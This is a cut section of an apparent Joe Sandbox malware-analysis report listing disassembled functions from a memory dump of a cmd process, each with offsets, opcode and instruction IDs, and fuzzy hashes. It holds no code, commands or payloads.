                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 72c72e1796cc372e71b659d4d5c9426461f8905e0b308b78a690f7129c9f1f59
                                                                                        • Instruction ID: 341434901f2400568bdb61ad1e10b650ea2d86d0c45c410a0251215307950e6b
                                                                                        • Opcode Fuzzy Hash: 72c72e1796cc372e71b659d4d5c9426461f8905e0b308b78a690f7129c9f1f59
                                                                                        • Instruction Fuzzy Hash: 4BA15975608342CFC714DF28C580A2ABBF9FF88344F1449AEE5959B350E771E945CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B9B0AF Relevance: .2, Instructions: 222COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                        • Instruction ID: 9320fbb08786d0137f12e3ecc2c98ea1ad0f138a3665388b8f5043c926babbd6
                                                                                        • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                        • Instruction Fuzzy Hash: 8771A135A0421A9BEF24CF55E480ABFF7B9EF49648F5941FBD801AB240E774DA41C790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B1E1A4 Relevance: .2, Instructions: 212COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ad4a909cd9dcd96989a1fef22c35d60a6992763067c5ae187e099474d50384b
                                                                                        • Instruction ID: 383468f680f79e6620a6d615af52cf94136792dd4c28a8cb75b13dbfa475266a
                                                                                        • Opcode Fuzzy Hash: 4ad4a909cd9dcd96989a1fef22c35d60a6992763067c5ae187e099474d50384b
                                                                                        • Instruction Fuzzy Hash: 75816D71A00609AFDB11CFA4C890BEAF7F9FF48358F544479E956A7210DB30E955CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE77F9 Relevance: .2, Instructions: 164COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5d6909fb23c2c30054591136c4cc8ef0765f83425a358bd273bc7da7ee5ab597
                                                                                        • Instruction ID: ed2ea7b89151d45263b265703507bf79ddc7d948b89b71eca5d6581f7c3434df
                                                                                        • Opcode Fuzzy Hash: 5d6909fb23c2c30054591136c4cc8ef0765f83425a358bd273bc7da7ee5ab597
                                                                                        • Instruction Fuzzy Hash: B3515775A08341DFC724DF29C190A2ABBF9FF88704F1449AEE5999B354E731E844CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03ADB273 Relevance: .2, Instructions: 161COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c966e8599edb1f83f2d1dcdeee9cca9b8ff7dcb854e357aedc67d103c6a1cf99
                                                                                        • Instruction ID: 4f9929137c9d673df281b9fb733877a966d6c9cbc984b0c16f144c3ae4328740
                                                                                        • Opcode Fuzzy Hash: c966e8599edb1f83f2d1dcdeee9cca9b8ff7dcb854e357aedc67d103c6a1cf99
                                                                                        • Instruction Fuzzy Hash: BC4106356407009FCB25EF59D950B1ABBA9EF45724F1A447FF50A9BA90E7B0D801CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B1E363 Relevance: .2, Instructions: 158COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: def26aba191706e2d44002c8723f33c4b502c49f4e7e40122a930180287ed504
                                                                                        • Instruction ID: 000bc57fac95c10293b0efd26dee9b8763f3c5309304636ccb77730c9f44ded4
                                                                                        • Opcode Fuzzy Hash: def26aba191706e2d44002c8723f33c4b502c49f4e7e40122a930180287ed504
                                                                                        • Instruction Fuzzy Hash: E8515E35200604DFCB21EFA4C990E6AB7F9FB44748F4408BAEA56DB6A0D730E951CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE7072 Relevance: .2, Instructions: 158COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e6a6ab628ffa14c4b7f5ca7f142a245c96249f9723bf465bc4e3aaf461c51ab8
                                                                                        • Instruction ID: fe33d27cf224bb14331369102adae2b8a0412de7c9c20135cc667bcf16795662
                                                                                        • Opcode Fuzzy Hash: e6a6ab628ffa14c4b7f5ca7f142a245c96249f9723bf465bc4e3aaf461c51ab8
                                                                                        • Instruction Fuzzy Hash: FE51EE34E00606EFDB15EB68C9547BDB7B8FF4432AF1441AAE50297290EB70D951DB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE510D Relevance: .1, Instructions: 149COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be752739512f6620cddc0bb47e2c872df2a2c816b6e10ab752862b08ef47620e
                                                                                        • Instruction ID: 35b10bc98eca5cafbacc8aa1753af7ddefb21e279f74fa91bcccf89194fae027
                                                                                        • Opcode Fuzzy Hash: be752739512f6620cddc0bb47e2c872df2a2c816b6e10ab752862b08ef47620e
                                                                                        • Instruction Fuzzy Hash: 3E517DB5E012159FEF25EBA8D940BADB3B4FB0A35CF1404AAE901EB250E774D9408B55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B1A350 Relevance: .1, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 80ee6a7b1091d8a6b2b9453e9d5ff527043a3a81b4b0a3ce1ebc51a2bcf1fa33
                                                                                        • Instruction ID: 8d5c75a9a90513e4a466f2663b725ed0cc5e64a88e3c733ffe572ba7df234e0d
                                                                                        • Opcode Fuzzy Hash: 80ee6a7b1091d8a6b2b9453e9d5ff527043a3a81b4b0a3ce1ebc51a2bcf1fa33
                                                                                        • Instruction Fuzzy Hash: 1E411775A423119BCB54FF68E991B6A7764EB8470CF8500FDFD069F241E771A820C790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03BB3157 Relevance: .1, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                        • Instruction ID: c7b1b656645f5b05e524d7c859abe85d059139bd9020ef595f50fd8dd6ebc1a3
                                                                                        • Opcode Fuzzy Hash: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                        • Instruction Fuzzy Hash: 14515875600606EFCB15CF54C580AA6BBF9FF45308F1981FAE9089F252E7B1E985CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B10118 Relevance: .1, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9367cdf30bc5afe9d0b24e300d5ae4ff23ec4ab13e1604d68b0a3318b624854f
                                                                                        • Instruction ID: d81d1b07e6f8268ccc579e3d50f806a8a3ff650ce67f72d04a72303a44f7a20a
                                                                                        • Opcode Fuzzy Hash: 9367cdf30bc5afe9d0b24e300d5ae4ff23ec4ab13e1604d68b0a3318b624854f
                                                                                        • Instruction Fuzzy Hash: 3641AD3AD012199BCB14EF98C440AEEF7B4FF49708F5842BAE815EB250D7359D91CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE6074 Relevance: .1, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7dd758fccd0038c3e69ca5ce3f8ebbbcdc1fc62ef3f74fc85a6e149ecfd412c9
                                                                                        • Instruction ID: 00125a2a7d52dde96f2726a404bb3f06e974a84ec9da299c35375f521417bb33
                                                                                        • Opcode Fuzzy Hash: 7dd758fccd0038c3e69ca5ce3f8ebbbcdc1fc62ef3f74fc85a6e149ecfd412c9
                                                                                        • Instruction Fuzzy Hash: 91512678A002169FCB25DB28CD04BE9BBB4EF11318F1886FBD1599B2E1E7749981DF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03ADB0D6 Relevance: .1, Instructions: 131COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2b720fe5da2364cf842a8216f54c1c32d05634d2d9a53799ed1679656ee16d3e
                                                                                        • Instruction ID: 02f733e85deb5e5c67dd177c9c9a592fa28f787a904df0bfb4425ccdc8ce771d
                                                                                        • Opcode Fuzzy Hash: 2b720fe5da2364cf842a8216f54c1c32d05634d2d9a53799ed1679656ee16d3e
                                                                                        • Instruction Fuzzy Hash: 2241BC75641715AFDB21EF68C950B2ABBF8EF04B58F0544BAF602DB690E770D900CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03BA81EE Relevance: .1, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                        • Instruction ID: 9ea448d52480923dcc96c9e61f132934fb06863a99dc4d8f28cbcbb44ae6a2fd
                                                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                        • Instruction Fuzzy Hash: 36417475F04A05ABDB14DB9DD885ABFBFB9EB88604F1840B9A405DB641DA70DE01C750
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE07A7 Relevance: .1, Instructions: 128COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a4654926049fcb2aa51ea0d0b4fb59e2199da79350317474691cd9309cdc484d
                                                                                        • Instruction ID: 7dd76c24e2c3e0baaae0a06fc4c9b7c870af9143fb6bd548dc3086afe499bdf1
                                                                                        • Opcode Fuzzy Hash: a4654926049fcb2aa51ea0d0b4fb59e2199da79350317474691cd9309cdc484d
                                                                                        • Instruction Fuzzy Hash: E7419F756007019FD724CF6AC580A22B7F9FF49304B544AAFE5568BA50E7B0E855CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B0A390 Relevance: .1, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5bf44094259ec3a5a5c9b58b3bffcb2d5d5907b9e71ddf162b2515a9d102e978
                                                                                        • Instruction ID: 3cc7e68c79ca3cd46cf0d8e6ebe26015b0f0fbb834fc995bf6002621e3a5b4d1
                                                                                        • Opcode Fuzzy Hash: 5bf44094259ec3a5a5c9b58b3bffcb2d5d5907b9e71ddf162b2515a9d102e978
                                                                                        • Instruction Fuzzy Hash: F841AD39905305CFCB11DF68D5A47ADBBB0FB58318F080AFAD415AB2D5EB349910CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03BAD7A7 Relevance: .1, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 070bbb303cb6073b306b996dd531d21c303bfb8808f7d3687073714935936305
                                                                                        • Instruction ID: e23101a9c440ca5cbf4848f2e5bbd3471b8afec3d30129e29e60af823c7f6255
                                                                                        • Opcode Fuzzy Hash: 070bbb303cb6073b306b996dd531d21c303bfb8808f7d3687073714935936305
                                                                                        • Instruction Fuzzy Hash: CC410175608F008BD325DF2CC8A4B2BB7E5EBC4718F0905BDE89287BA0EA34D845C750
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B11796 Relevance: .1, Instructions: 112COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cd657d2a147465f6a04e0939db3c15c84f6f7337db1bfd3f032d2ca082cb9098
                                                                                        • Instruction ID: d5961f6439a963f504a5a599034562017b39e07be85fe2f6c37f1ef768a9d9b2
                                                                                        • Opcode Fuzzy Hash: cd657d2a147465f6a04e0939db3c15c84f6f7337db1bfd3f032d2ca082cb9098
                                                                                        • Instruction Fuzzy Hash: F1418879A00245DFCB15CF9CD590BA9BBF1FB49318F1881BAE909AB344D774A941CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B60227 Relevance: .1, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e36e860b4090bbd7f9b5a878d5ff09c429ecc40af8e367b96393c7449399b791
                                                                                        • Instruction ID: 278cb5891fe9d5375df4d0160c9bb62a966125a691fe8ddb2a6568c97ca812f7
                                                                                        • Opcode Fuzzy Hash: e36e860b4090bbd7f9b5a878d5ff09c429ecc40af8e367b96393c7449399b791
                                                                                        • Instruction Fuzzy Hash: 9C41D2366087419FC320EF69C850B6AB7E9FF88704F080A6DF859CB691E734D914C7A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AF01F1 Relevance: .1, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                        • Instruction ID: 8d49d7c37177f3510d3157ff887a74fb3917a9a4731652f419d63ec2c66914ec
                                                                                        • Opcode Fuzzy Hash: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                        • Instruction Fuzzy Hash: 3A312335A00244AFDB21CBA8CC44BAABBF9EF05350F0845BBF955DB352C674D884CB65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B09194 Relevance: .1, Instructions: 105COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4f903168d8b7104dc2c63ff8bc6d7bf4c009504b0cb87ac583dd1d1ff871d469
                                                                                        • Instruction ID: 804c96bdcb72b35f615ee15407d5c700a4ed78989a38210848c818d6918570eb
                                                                                        • Opcode Fuzzy Hash: 4f903168d8b7104dc2c63ff8bc6d7bf4c009504b0cb87ac583dd1d1ff871d469
                                                                                        • Instruction Fuzzy Hash: 7F318176E003289FDB61CB64DC40F9ABBB9EF86714F1501E9B94CAB291DB309E448F51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE4180 Relevance: .1, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c43b9365c54114f799acdef574272efbaed4cd0d107a599c11be7d56ea4d58d9
                                                                                        • Instruction ID: 188c791c16503410b67c9e90c2b16984a2f429d1a200cbd8f1d5ad67e27c4b04
                                                                                        • Opcode Fuzzy Hash: c43b9365c54114f799acdef574272efbaed4cd0d107a599c11be7d56ea4d58d9
                                                                                        • Instruction Fuzzy Hash: 5D41AE35104744DFC726DF29C590FD6BBE8EF49318F05886AEA998B750D774E800DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B05004 Relevance: .1, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                        • Instruction ID: c86572f2fd91b0cb1d0a4d5e1f9ff9706307997fdfcbf8afeff1405e5838b93c
                                                                                        • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
